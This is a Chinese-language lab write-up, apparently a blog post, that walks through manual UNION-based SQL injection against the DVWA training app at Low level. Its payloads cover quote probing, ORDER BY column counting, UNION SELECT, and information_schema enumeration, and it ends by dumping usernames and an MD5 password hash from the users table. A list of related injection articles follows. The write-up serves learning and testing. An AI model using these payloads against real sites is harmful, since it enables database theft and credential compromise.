来源 dvwa 平台 级别为Low 中的SQL Injection 试题

1. 判断注入点

# 网址?id=1

id=1\

id=1'# 页面如果报错多了一个单引号,那么说明可能存在注入点

‘id=1 and 1=1’页面正常,‘id=1 and 1=2’时页面不正常,则这个页面边可能存在注入

id=1' # # '#' 号注释,注释闭合的单引号,可以试试

当前题目使用 id=1' # # 后面注释,截断

2.判断列的个数 order by

id=1' oreder by 2 #

id=1' oreder by 3 #

# 测试 判断列数3 报错,有2列

3.判断回显位 union

# 输入一个不存在的id

?id=-1' union select 100,200 #

# select 后面 个数和列数对应,看网页中显示位置上的数,表示那个位置为回显位

# 回显位为 ----> 200 位置

4. 替换回显位,注入

使用内部变量,或者语句

# database() 数据库名

# -1' union select 100,database() #

# 库名为 ----->dvwa

库名,版本等信息

version()、@@datadir、@@basedir

5.根据information_schema 库

information_schema 数据库中记录所有信息

information_schema.tables表中记录所有数据库名 table_schema,table_name 重要字段

information_schema.columns 表中记录所有列名 table_schema,table_name,column_name 重要字段

group_concat(字段名) 函数,可以让字段显示在同一行

注入出表名

information_schema.tables 根据这个表

# -1' union select 100,group_concat(table_name) from information_schema.tables where table_schema=database() #

或者 后面的 database() 直接换成上一步注入出来的库名

-1' union select 100,group_concat(table_name) from information_schema.tables where table_schema=database() #

# 注入出两个表--->guestbook,users

注入出列名

information_schema.columns 根据这个表

# -1' union select 100,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

# 表中所有列 user_id,first_name,last_name,user,password,avatar,last_login,failed_login

6.注入出user表数据

-1' union select 100, group_concat(user_id , user , password,) from dvwa.users #

# 查询所有

-1' union select 100, user from dvwa.users limit 0,1 #

# 查询users表中的user 字段第一个------》 admin

-1' union select 100, password from dvwa.users limit 0,1 #

# 查询密码第一个 -----》 5f4dcc3b5aa765d61d8327deb882cf99

大概过程,自己记录一下。

mysql手工注入imformation_mysql 简单手工注入相关推荐

  1. sql注入(最简单的注入)

    1.加了引号报错,提示多了个引号,判断出是数字型,加了引号没出错,可判断出是字符型 2.and 1=1正确,1=2错误,说明我们添加的语句可被执行,结合第一步可判断出存在数字型注入 3.order b ...

  2. mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程

    0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...

  3. mysql 结束符报错_Mysql手工注入小结

    前言 实习电话面的时候,问到了sql注入的利用,我扒拉扒拉一大堆,结果脑子一抽,说Mysql注入不支持堆叠注入 我学安全目前最后悔的事情就是,最开始入门的时候,连数据库这门课都没开始学,当时连最基本的 ...

  4. 【Mysql优化安全】防止sql注入

    [Mysql安全]防止sql注入 (1)什么是sql注入 (2)寻找sql注入的方法 (3)mybatis是如何做到防止sql注入的 (3.1)sql对比 (3.2)简单分析 (3.3)底层实现原理 ...

  5. 墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)

    0x00.题目描述: 背景介绍 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份. 实训目标 1.熟练掌握留言板的工作原 ...

  6. mysql宽字节注入_(宽字节注入) 手注+sqlmap

    进入题目后先简单尝试一下. 很明显的宽字节注入. 宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码. 手工注入 1.判断列数: http://chinalo ...

  7. mysql oder by 注入_Order by排序注入方法小总结

    今天总结一下注入点在order by排序注入,学习一下记录下这个过程 声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负! 注入方法介绍 当页面出现mysql报错信息时,注入点在 orde ...

  8. mysql 16进制 绕过_注入绕过技巧

    1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20%09%0a %0b %0c %0d %a0/**/ 最基本的绕过方法,用注释替换空格: /* ...

  9. 利用mysql的预编译机制_SQL注入笔记记录+MySQL的事务隔离级别

    (一)SQL注入. 1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法. 2.SQL注入是如何产生的? web开发人员无法保证所有的输入 ...

最新文章

  1. 上古卷轴3晨风职业_上古卷轴3:晨风
  2. 【NOIP模拟】T1 发电机(递推逆元+期望)
  3. C语言查找单链列表的第k个元素的算法(附完整源码)
  4. linux读conf文件格式,CONF 文件扩展名: 它是什么以及如何打开它?
  5. 计算机中丢失dinput8,修复dnfdinput8.dll
  6. php论坛学习的一个遍历的问题(学习)
  7. nginx源码安装教程
  8. SecureCRT自动化脚本编写
  9. ps怎么更改背景图层大小_ps修改背景教程
  10. 解决: Tomcat 启动项目没问题,访问网页页面出现空白无显示
  11. 360的困兽之斗——探讨奇虎Tecent商业模式
  12. matlab 某一函数半高,1. 半高宽的知识
  13. 南邮《网络技术与应用,携程开源的分布式apollo技术
  14. h3c交换机重启_h3c交换机重置命令_h3c交换机如何初始化
  15. cpc按点击计算怎么算_亚马逊CR怎么算?亚马逊CR及CTR计算公式介绍
  16. mysql教学磁力链_使用MySQL存储以太坊事件
  17. 做好黑客入侵防护,你需要了解这些入侵工具
  18. memtester4.3.0
  19. HDU - 1613 Ecological Bin Packing
  20. 安徽科技学院 信网学院网络文化节 王鑫

热门文章

  1. python基础字典(七)
  2. 二级计算机java2017级_2017计算机等级二级考试java练习题及答案
  3. unity字符串换行符_unity如何在中文文本换行时实现排版换行,避免标点符号出现在行首等比较丑的情况?...
  4. cr3格式是什么意思_尼康DX镜头是什么意思
  5. pygame小游戏(接球小游戏)
  6. C#中适当的列表支持
  7. 创建一个delete触发器_基于 Django 信号机制实现类似触发器的效果
  8. 计算机基础ppt_为什么大学老师教编程上课都不敲代码?为何老师上课都是PPT讲解,实战呢?...
  9. php 判断html5,html5触摸事件判断滑动方向的实现
  10. 远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用